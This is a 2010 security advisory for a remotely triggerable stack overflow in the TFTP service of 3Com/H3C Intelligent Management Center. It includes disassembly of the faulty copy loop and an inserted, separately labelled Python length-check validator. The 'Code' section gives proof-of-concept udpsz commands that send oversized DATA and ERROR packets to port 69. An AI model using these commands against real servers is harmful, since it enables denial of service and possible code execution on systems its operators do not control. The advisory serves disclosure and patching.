#######################################################################

                             Luigi Auriemma

Application:  3com / H3C Intelligent Management Center (IMC)
              http://www.3com.com/IMC_Enterprise/
Versions:     <= 3.3 SP2 R2606P13
Platforms:    Windows, Linux, Solaris
Bug:          stack overflow in tftpserver.exe
Exploitation: remote, versus server
Date:         found 19 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"3Com® Intelligent Management Center (IMC) Enterprise Edition is a
self-contained comprehensive management solution, flexible and scalable
enough to meet the needs of advanced Enterprise networks."

The suite is also known under the vendors HP and H3C (the original
developer).

#######################################################################

======
2) Bug
======

tftpserver.exe is a TFTP service running on UDP port 69 and available in
the default configuration of IMC.

The service is affected by a stack overflow caused by the function that
handles the DATA (0x03) and ERROR (0x05) opcodes:

  00405240   . 8A1408          MOV DL,BYTE PTR DS:[EAX+ECX]
  00405243   . 885407 2A       MOV BYTE PTR DS:[EDI+EAX+2A],DL
  00405247   . 40              INC EAX
  00405248   . 3BC6            CMP EAX,ESI
  0040524A   .^72 F4           JB SHORT tftpserv.00405240

Note that on Windows the "stack canary" doesn't allow the execution of
code (Denial of Service only), so only Solaris and Linux are affected by
this vulnerability.
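As an added example (not part of the advisory and not the vendor's code), a defender-side length check in Python for the two opcodes named above: it validates a UDP/69 datagram against the RFC 1350 limits before any payload byte is copied, and runs over constructed datagrams, two of which have the shape of the udpsz packets from section 3. The 512-byte blksize default (no option negotiation) and the MAX_ERRMSG cap are assumptions of this example.

```python
import struct

# TFTP opcodes from RFC 1350
OP_RRQ, OP_WRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 2, 3, 4, 5

# RFC 1350 caps a DATA block at 512 bytes unless a larger blksize (RFC 2348)
# was negotiated; no option negotiation is assumed here. MAX_ERRMSG is a cap
# chosen for this example, not a value taken from the advisory.
DEFAULT_BLKSIZE = 512
MAX_ERRMSG = 128

def check_tftp_packet(pkt, blksize=DEFAULT_BLKSIZE):
    """Return (accept, reason) for one UDP/69 datagram, judged on the header
    and lengths alone, before any payload byte is copied anywhere."""
    if len(pkt) < 4:
        return False, "truncated header"
    opcode, _field = struct.unpack("!HH", pkt[:4])  # opcode, block#/errcode
    payload = pkt[4:]
    if opcode == OP_DATA:
        if len(payload) > blksize:
            return False, "DATA payload %d > blksize %d" % (len(payload), blksize)
        return True, "ok"
    if opcode == OP_ERROR:
        nul = payload.find(b"\x00")  # ErrMsg must be NUL-terminated
        if nul < 0:
            return False, "ERROR message not NUL-terminated"
        if nul > MAX_ERRMSG:
            return False, "ERROR message %d > %d" % (nul, MAX_ERRMSG)
        return True, "ok"
    if opcode in (OP_RRQ, OP_WRQ, OP_ACK):
        return True, "ok"  # request/ack formats are out of scope here
    return False, "unknown opcode %d" % opcode

# Constructed samples. The two oversized ones have the shape of the advisory's
# udpsz invocations: a 4-byte header, then 0x61 ('a') padding to 1024 bytes.
SAMPLES = {
    "data_ok":       b"\x00\x03\x00\x01" + b"\x61" * 512,
    "data_oversize": b"\x00\x03\x00\x00" + b"\x61" * 1020,
    "error_ok":      b"\x00\x05\x00\x01" + b"File not found\x00",
    "error_no_nul":  b"\x00\x05\x00\x00" + b"\x61" * 1020,
}

def audit(samples=SAMPLES):
    """Return {name: reason} for every sample the check rejects."""
    rejected = {}
    for name, pkt in samples.items():
        ok, reason = check_tftp_packet(pkt)
        if not ok:
            rejected[name] = reason
    return rejected
```

The same check placed in front of a TFTP handler (or in an IDS rule on port 69) turns the oversized datagram into a logged drop instead of an unbounded copy into a fixed stack buffer.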
#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -C "0003 0000" -b 0x61 SERVER 69 1024

or

  udpsz -C "0005 0000" -b 0x61 SERVER 69 1024

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-164

#######################################################################